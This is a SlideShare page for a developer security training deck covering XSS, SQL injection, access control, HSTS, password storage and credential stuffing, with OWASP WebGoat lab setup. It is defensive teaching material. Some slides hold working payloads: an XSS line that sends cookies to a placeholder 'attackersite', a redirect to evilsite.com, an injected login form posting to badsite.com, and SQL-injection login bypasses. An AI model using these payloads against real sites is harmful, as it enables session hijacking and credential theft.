Devbeat Conference - Developer First Security

17,383 views

Published on

Topics include:

- Sample and Demo of Top Application Risks
— Cross Site Scripting, SQL Injection, Access Control

- Who’s Monitoring Your Traffic?
— Encrypting in Transit
Secure Data Storage & Protection
— Correct Password

-Storage & Data Protection

-Growing Threats Plaguing Applications

Published in: Technology, Business
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
17,383
On SlideShare
0
From Embeds
0
Number of Embeds
1,285
Actions
Shares
0
Downloads
40
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

Devbeat Conference - Developer First Security

  1. 1. Developer-first security Integrating Security into Development Michael Coates ! michael@ShapeSecurity.com michael-coates.blogspot.com @_mwc
  2. 2. About Me michael@shapesecurity.com
  3. 3. Reality
  4. 4. “The global cost of cybercrime is greater than the combined effect on the global economy of trafficking in marijuana, heroin and cocaine” ! h"p://www.theregister.co.uk/2011/09/07/cost_is_more_than_some_drug_trafficking   h"p://uk.norton.com/content/en/uk/home_homeoffice/html/cybercrimereport/  
  5. 5. Data Loss & Breaches datalossdb.org Verizon Data Breach Report 2013
  6. 6. Outside Attackers datalossdb.org Verizon Data Breach Report 2013
  7. 7. Security - Into The Details • Sample and Demo of Top Application Risks
 — Cross Site Scripting, SQL Injection, Access Control • Who’s Monitoring Your Traffic?
 — Encrypting in Transit • Secure Data Storage & Protection
 — Correct Password Storage & Data Protection • Growing Threats Plaguing Applications
  8. 8. WARNING Security Testing is ILLEGAL ON UNAUTHORIZED SYSTEMS
  9. 9. 3 Dangerous Vulnerabilities Cross Site Scripting SQL Injection Access Control
  10. 10. What are Web Requests Open console & enter the following:
 • 
 telnet google.com 80
 GET / HTTP/1.1 • Hit return 2 times
  11. 11. Cross Site Scripting (XSS) • Problem: User controlled data returned in HTTP response contains HTML/JavaScript code • Impact: Session Hijacking, Full Control of Page, Malicious Redirects • Basic XSS Test:
 " ><script>alert(document.cookie)</script> • Cookie Theft Example:
 "><script>document.location='http://attackersite/ '+document.cookie</script>
  12. 12. XSS Behind The Scenes http://shinypage.com?user=Bob JSP Code <h1>Glad to see you <%= request.getParameter("name") %></h1> HTML Source Rendered HTML <div>Glad to see you <b>Bob</b></div>
  13. 13. XSS Behind The Scenes http://shinypage.com?user=friend</b>
 <br><form method=”post” action=”badsite.com/login”> 
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
  14. 14. XSS - Injecting HTML Rendered HTML
  15. 15. Cross Site Scripting • Cross Site Scripting typically uses JavaScript to do bad things • Steal session cookies <script>alert(document.cookie)</script> • Redirect to bad pages 
 <script>window.location = "http://evilsite.com/"</script> • Rewrite page on the fly
  16. 16. Lab! - Reflected XSS
  17. 17. Reflected XSS Lab • Lesson: Cross-Site Scripting->Reflected XSS Attacks • Proxy Not Needed
  18. 18. Lab! - Stored XSS
  19. 19. Stored XSS Lab • Lesson: Cross-Site Scripting>Stored XSS Attacks • Proxy Not Needed
  20. 20. XSS Prevention • Solution
 1. Output Encoding - converts command characters to benign characters for display
 2. Input Validation <h1>Glad to see you <%=encodeForHTML( request.getParameter("name") ) %></h1> < > “ ‘ & HTML Encoding &lt; &gt; &quote; ' &amp;
  21. 21. XSS Attempt Revisited http://shinypage.com?user=friend</b>
 <br><form method=”post” action=”badsite.com/login”> 
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
  22. 22. Safe Handling Rendered HTML Glad to see you friend</b>
 <br><form method="post" action="badsite.com/ login"> 
 Login: <input type="text" name="username"><br>
 Password:<input type="password" name="password">
 <input type="submit" value="Submit" /></form>
  23. 23. XSS Resources • OWASP XSS Prevention Cheat Sheet 
 - http://bit.ly/XSS-OWASP • Content Security Policy 
 - http://bit.ly/CSP-OWASP • OWASP XSS Overview 
 - http://bit.ly/OWASPXSS
  24. 24. SQL Injection • Problem: User controlled data improperly used with SQL statements • Impact: Arbitrary SQL Execution, Data Corruption, Data Theft • Basic SQL Injection Tests:
 OR 1=1 --
 ' OR '1'= '1'-- • Example Vulnerable Query:
 sqlQ = “Select user from UserTable where name= '+username+ ' and pass = '+password+ ' ”
  25. 25. Lab! - SQL Lesson
  26. 26. SQL Injection • Lesson: Injection Flaws -> Lab: SQL Injection -> Stage 1: String SQL Injection • Proxy Needed • Objective: Bypass the login page by inserting “control” characters. Login as “Neville” w/o knowledge of the password
  27. 27. SQL Injection • HTTP Post
 employee_id=112&password=x' OR ‘1'='1 &action=Login • Vulnerable SQL
 Select user from UserTable where name= '+username+ ' and pass = '+password+ ‘ • Resulting Statement
 Select user from UserTable where name= '112' and 
 pass = 'x' OR '1'='1' • Result: ... name = ' 112 ' and pass = 'x ' OR TRUE
  28. 28. SQL Injection • Parameterized Queries
 No confusion with control characters
 Example: would look for password of ‘ or ‘1’=’1 • Input Validation
 Are special characters needed for most fields?
 What about non-printable characters %00-%0A?

  29. 29. SQL Injection Resources • https://www.owasp.org/index.php/ SQL_Injection_Prevention_Cheat_Sheet
  30. 30. Access Control • Problem: Developers assume some parts of app can’t be seen, tampered with or invoked by the user • Impact: Unauthorized data access, access to privileged functionality • Basic Access Control Test: Inspect HTTP requests - iterate numbers, guess other values for arguments • Access Control Failure Example:! • http://somebadbank.com/showacct?id=101 • http://somebadbank.com/showacct?id=102

  31. 31. Lab! - Access Control
  32. 32. Access Control Violation • Lesson: Access Control Flaws>LAB: Role Based Access Control->Stage 1: Bypass Business Layer Access Control • Proxy Needed • Objective: Find way to execute “delete” functionality using Tom’s account. Delete account “tom”
  33. 33. Access Control Violation • Hint: Login with Tom and perform available actions (search staff, view profile). Figure out how action name is sent to server POST /webgoat/attack?Screen=43&menu=200 HTTP/1.1 Host: localhost ! employee_id=105&action=ViewProfile
  34. 34. Strong Access Controls • Access Control Performed Server Side • Never Relies Upon “Security by Obscurity” • Be Careful with Identifiers (e.g. id=123) • Attacker Can Send Anything in Request • Presentation Layer Controls Can Not Enforce Access Control
  35. 35. Access Control Resources • https://www.owasp.org/index.php/ Access_Control_Cheat_Sheet
  36. 36. Who’s Monitoring Your Traffic?
  37. 37. Insecure Session Management • Secure login over HTTPS • • Password submitted encrypted Immediate redirect to HTTP • Session ID sent cleartext <-- vulnerability point https://site.com/login http://site.com/profile
  38. 38. Vulnerable Redirects • User requests HTTP page, response redirects HTTPS • 302 Response is HTTP <-- Vulnerability Point
  39. 39. Secure Design for Communication • Use HTTPS Throughout Web Site! • HTTP Strict Transport Security (HSTS)! • • • Opt-in security control Website instructs compatible browser to enable STS for site HSTS Forces (for enabled site): • All communication over HTTPS • No insecure HTTP requests sent from browser • No option for user to override untrusted certificates
  40. 40. Strict Transport Security • Browser prevents HTTP requests to HSTS site • Any request to site is “upgraded” to HTTPS • No clear text HTTP traffic ever sent to HSTS site • Browser assumes HTTPS for HSTS sites
  41. 41. Secure Data Storage & Protection
  42. 42. Password Storage Bad Approaches! • Your own algorithm • Good Approach! md5 encryption • base64 encoding • rot 13 PBKDF2 sha1 • Bcrypt • • • + Per User Salt
  43. 43. What Are We Protecting? Correct password hashing protects against:! ! • Offline attacks of password repository ! • Brute Force, Rainbow Attacks ! Does not address:! Guessing easy passwords Password theft, disclosure Session Hijacking Credential Stuffing
  44. 44. Architecture for Sensitive Data https://site.com web server internal SSL database Monitor Database Queries & Response Size
  45. 45. Encrypting Sensitive Data in Database Encrypt User Data Customer/Group Encryption Key Key Encrypting Key database Decrypt Hardware Security Module Encrypted [Customer/Group Encryption Key] Encryption within Database
 Unique keys per data region
 Key encrypting keys
 Hardware Security Modules (
  46. 46. Growing Threats Plaguing Applications
  47. 47. Denial of Service Denial of Service (DOS) Distributed Denial of Service (DDOS)
  48. 48. Denial of Service Network DDOS Application Layer DDOS site.com/generateReport Exhaust Network! Bandwidth Exhaust Server ! CPU/Memory
  49. 49. Application Denial of Service Application DDOS ! Traditional Network DDOS ! • overwhelms target with volume • • • • exhausts bandwidth / capacity of network devices invokes computationally intense application functions • exhausts CPU / memory of web servers Requires large number of machines • Requires few machines • Defenses: Few available, must customize Defenses: CDN, antiDDOS services
  50. 50. Credential Stuffing compromised! server! Credentials! joe: abc123! sue: password1! bob: MyP0n3y Stolen Credentials! joe: abc123! sue: password1! bob: MyP0n3y sue:password1 joe: abc123 https://site.com/login!
  51. 51. Take Aways • Understand top security threats and anticipate potential malicious use of application to design secure code • Multiple controls possible to protect sensitive data in transit and storage • Understand emerging threats to plan for appropriate defenses • Use OWASP BWA Security Lab and learn more!
  52. 52. Thanks! michael@ShapeSecurity.com http://michael-coates.blogspot.com @_mwc
  53. 53. Virtual Security Training Lab Setup
  54. 54. Software • Vulnerable Server: OWASP’s Webgoat • Proxy Tool - OWASP’s ZAP (Zed Attack Proxy) • Browser • Virtual Machine: OWASP Broken Web App VM
  55. 55. Test Connectivity to VM 1.Open Browser 2.Browse to your VM ip (listed in VM login page) • e.g. http://192.168.56.101 3.Should see OWASP BWA welcome page 4.Error? Check ip address of VM
  56. 56. WebGoat • Click First Link - OWASP WebGoat version 5.3.x • Username / Password is guest / guest
  57. 57. Understanding the Proxy • Proxy is middle-man between browser and web server • Assists with traffic manipulation & inspection Attacker’s Browser Web Proxy Web Server
  58. 58. Understanding the Proxy Primary OS Browser Web Proxy Your Computer VM Web Server
  59. 59. Enabling Proxy 1.Open ZAP 2.Configure Firefox to use proxy 3.Resend Request 4.Confirm received by proxy 5.Forward to web server (vm)
  60. 60. Using A Proxy • ZAP - Configure to listen on 8080
  61. 61. Set Firefox Proxy • Set Firefox proxy to 8080 • Preferences 
 -> Advanced 
 -> Network 
 -> Settings • Set HTTP Proxy • Important - clear 
 “No Proxy for” line
  62. 62. Confirm Setup Works • Refresh Web Browser • Go to ZAP • See site in left-hand column
  63. 63. Intercepting Traffic • Add a “breakpoint” by right clicking on the page and choosing “Break...” ! ! ! ! • Refresh the webpage - it will hang • Modify the request as needed, then press the “Continue” button
  64. 64. “Hello World” of Proxies • Lesson: General->Http Basic • Objective: • Enter your name into text box • Intercept with proxy & change entered name to different value • Receive response & observe modified value is reversed Joe Sue euS Attacker’s euS Web Proxy Browser Web Server

×